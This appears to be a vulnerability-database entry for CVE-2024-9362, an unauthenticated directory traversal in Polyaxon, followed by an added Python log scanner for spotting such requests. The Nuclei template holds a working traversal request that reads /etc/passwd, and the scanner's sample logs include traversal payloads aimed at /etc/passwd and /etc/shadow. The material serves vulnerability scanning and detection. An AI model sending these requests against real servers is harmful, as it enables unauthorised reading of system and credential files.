Polyaxon - Unauthenticated Directory Traversal
CVE-2024-9362
Verified
Description
The latest version of Polyaxon contains a path traversal vulnerability caused by insufficient validation in directory access. It lets attackers retrieve directory information and file contents, and exploitation requires no authentication.
Severity
High
CVSS Score
7.5
Exploit Probability
25%
Published Date
May 23, 2026
Template Author
yunseo
CVE-2024-9362.yaml
id: CVE-2024-9362
info:
  name: Polyaxon - Unauthenticated Directory Traversal
  author: yunseo
  severity: high
  description: |
    Polyaxon latest version contains a path traversal caused by insufficient validation in directory access, letting unauthenticated attackers retrieve directory information and file contents, exploit requires no authentication.
  impact: |
    Attackers can access sensitive system directories and files, leading to information disclosure and potential further exploitation.
  remediation: |
    Update to the latest version with patched validation mechanisms.
  reference:
    - https://github.com/polyaxon/polyaxon
    - https://huntr.com/bounties/d8dcb40f-ce76-4524-8d06-e0f12a07809d
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-9362
    epss-score: 0.24558
    epss-percentile: 0.96258
    cwe-id: CWE-22
  metadata:
    max-request: 1
    verified: true
    fofa-query: title=="Polyaxon"
  tags: cve,cve2024,polyaxon,lfi,traversal,unauth
http:
  - method: GET
    path:
      - "{{BaseURL}}/streams/v1/polyaxon/default/s/runs/%2e%2e/artifact?stream=true&path=../../../../etc/passwd"
    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
      - type: status
        status:
          - 200
# digest: 4a0a00473045022100c4ea64a68d133c1579e01a7de0c9d20c3ce74b1aee37ea74c58eb982420e808f02206015b0962cc622ef7e8c00811f2cf141d9e3289e7bf724e0caaa64cd263b5f32:922c64590222798bb761d5b6d8e72950
CVSS Metrics
Score:
7.5
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID:
CVE-2024-9362
CWE ID:
CWE-22
Remediation Steps
Update to the latest version with patched validation mechanisms.
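A defender-side check for the request shape this template sends, as an added example that is not part of the template or of Polyaxon: it scans access-log lines for `/streams/v1/` requests whose URL path contains a dot segment or whose `path` parameter climbs out of its base directory, after undoing nested percent-encoding. The log lines, the combined log format, the run id `8f1c`, the `/api/v1/projects` path and all function names are constructed assumptions.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines in combined log format (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [23/May/2026:10:00:01 +0000] "GET /streams/v1/polyaxon/default'
    '/s/runs/%2e%2e/artifact?stream=true&path=../../../../etc/passwd HTTP/1.1" 200 1843',
    '198.51.100.4 - - [23/May/2026:10:00:05 +0000] "GET /streams/v1/polyaxon/default'
    '/s/runs/8f1c/artifact?stream=true&path=outputs/model.pkl HTTP/1.1" 200 52011',
    '198.51.100.9 - - [23/May/2026:10:00:09 +0000] "GET /streams/v1/polyaxon/default'
    '/s/runs/8f1c/artifact?path=%252e%252e%2f%252e%252e%2fetc%2fshadow HTTP/1.1" 404 0',
    '192.0.2.10 - - [23/May/2026:10:00:12 +0000] "GET /api/v1/projects HTTP/1.1" 200 310',
]
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+" (\d{3})')

def fully_unquote(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding (catches %252e)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def escapes_root(relpath):
    """True if a relative path is absolute or climbs above its base directory."""
    norm = posixpath.normpath(fully_unquote(relpath).replace("\\", "/"))
    return norm.startswith("/") or norm == ".." or norm.startswith("../")

def classify(line):
    """Return a finding dict for a suspicious streams request, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url, status = urlsplit(m.group(1)), int(m.group(2))
    if not url.path.startswith("/streams/v1/"):
        return None
    reasons = []
    if ".." in fully_unquote(url.path).split("/"):
        reasons.append("dot-segment in URL path")
    if any(escapes_root(v) for v in parse_qs(url.query).get("path", [])):
        reasons.append("path parameter escapes artifact root")
    if not reasons:
        return None
    # status 200 mirrors the template's status matcher: a response was served
    return {"status": status, "served": status == 200, "reasons": reasons}

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(classify(entry))
```

A finding with `served` set to true is the one to triage first, since the template itself treats a 200 response as part of a confirmed match.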